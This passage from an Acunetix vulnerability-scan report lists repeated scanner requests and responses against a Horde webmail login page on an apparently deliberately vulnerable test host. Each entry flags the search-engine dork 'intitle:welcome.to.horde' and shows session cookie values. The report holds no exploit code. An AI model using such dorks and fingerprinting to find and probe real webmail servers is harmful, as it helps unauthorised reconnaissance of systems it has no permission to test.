||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=UkHoj_BUzaHgQnp7cwu9IPDGdx0&imapuser=cderdwxu&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 |
||||||||||||||||||
Acunetix Website Audit | 49 |
X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT |
||||||||||||||||||
/imp/login.php (158764c7d282ec5f81da00419114f313) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x202d;Chinese%20(Traditional)%20(%26%23x6b63;%26%23x9ad4;%26%23x4e2d;%26%23x6587;) HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:22 GMT Content-Length: 10190 |
||||||||||||||||||
/imp/login.php (1d46c5eb93aa7d11eef06bf0a0191c08) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=9kdIZoVZfUu0i92_Wr0XpxEkycw&imapuser=kknytbhi&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language |
||||||||||||||||||
Acunetix Website Audit | 50 |
Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT |
||||||||||||||||||
/imp/login.php (1d86503a775e69aaf8cfae2e3c4262b8) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=8MnlK_AkVv_w-etJcyh00h3qZtk&imapuser=atsoewoc&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (218aabb29b4f5701fbeef27d6e22e8ae) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x202d;Bulgarian%20(%26%23x0411;%26%23x044a;%26%23x043b;%26%23x0433;%26%23x0430;%26%23x0440;%26%23x0441;%26%23x043a;%26%23x0438;) HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT |
||||||||||||||||||
Acunetix Website Audit | 51 |
Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT |
||||||||||||||||||
/imp/login.php (28fc832e122bfd3d7aa0d9fc9e93c214) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=fxkAiJl0cUvTGsyglzEAgwmsGvk&imapuser=bsximucj&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (2a85dcb007870d301225d725fb7aced5) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=S9hLBWmjg9w-hz-Cez65kwSQFDI&imapuser=hkuhjfvd&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 |
||||||||||||||||||
Acunetix Website Audit | 52 |
Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:10 GMT |
||||||||||||||||||
/imp/login.php (36ce5744f27f6f06f85c2dac9f0ac09c) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=rpo9s0fEQvr-PL8-6YEmPmL6eYE&imapuser=vhqsmkqh&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (3a784d3148a695e5246e4f7712293772) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=4IdDEVByjuc3qQ9aCCZa_zV1Ju0&imapuser=lyoxhoba&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache |
||||||||||||||||||
Acunetix Website Audit | 53 |
Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT |
||||||||||||||||||
/imp/login.php (4435f865242a495136a5f5376d63a435) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=pdL5-YjGG7Nh5C6m9jNlmZpORww&imapuser=ivxkbmfl&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (4bff40967d6a993cb33f6ffe4f726c45) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x202d;Chinese%20(Simplified)%20(%26%23x7b80;%26%23x4f53;%26%23x4e2d;%26%23x6587;) HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 |
||||||||||||||||||
Acunetix Website Audit | 54 |
Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT |
||||||||||||||||||
/imp/login.php (733b34e2771d847f3e677868a914fc27) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=TDQA5rJjyTg4m99KcTR4_kGc2Ck&imapuser=ggqsiwfl&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10395 |
||||||||||||||||||
/imp/login.php (7f2892c38a099a99d15882e6395df8ed) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=Dansk HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache |
||||||||||||||||||
Acunetix Website Audit | 55 |
Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:22 GMT |
||||||||||||||||||
/imp/login.php (81366dbb3a1b19d17070dae7247058f6) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=YOAPl3vWsuqm_TL_FXgl0owpZmM&imapuser=iyeojwka&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (8d2af24adeca98940d4ca72de057c259) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x202d;Arabic%20(Syria)%20%26%23x202e;(%26%23x0627;%26%23x0644;%26%23x0639;%26%23x0631;%26%23x0628;%26%23x064a;%26%23x0629;) HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 |
||||||||||||||||||
Acunetix Website Audit | 56 |
Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT |
||||||||||||||||||
/imp/login.php (92d3a0adc0d0c42811b54244a0913050) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=81ZHbgsWu6SDUtUtwCSI2FaJ-BE&imapuser=hurcfetk&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10395 |
||||||||||||||||||
/imp/login.php (98144b1b8c67561c22adeba83a43a266) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=py6BVY4d7g6gx0ofFWB1kQ6hRdY&imapuser=sjtjgfnc&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK | ||||||||||||||||||
Acunetix Website Audit | 57 |
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT |
||||||||||||||||||
/imp/login.php (9b42f8057a8701d8c0448698f0d7a0ff) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=Bahasa%20Indonesia HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (a12e6bd4443144c1b8c23ea00c2ffe38) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=Catal%26%23xe0; HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 |
||||||||||||||||||
Acunetix Website Audit | 58 |
Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT |
||||||||||||||||||
/imp/login.php (a2ba6948a038d7a3a440afb1fc9eceed) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x010c;esky HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (b0db092b89360e30820e995c6abbbc83) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=g9u7H-78CHQyg9CQNPHaIUumuT8&imapuser=grwtfvif&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT |
||||||||||||||||||
Acunetix Website Audit | 59 |
Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT |
||||||||||||||||||
/imp/login.php (b3cb8470038a18bddad7a22934963f28) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=UVdJ_qdy2FCjlafyUTTJOJOjkUM&imapuser=tjmxnsfk&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (b6658f01c57b6184aa9e241e81e8115a) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
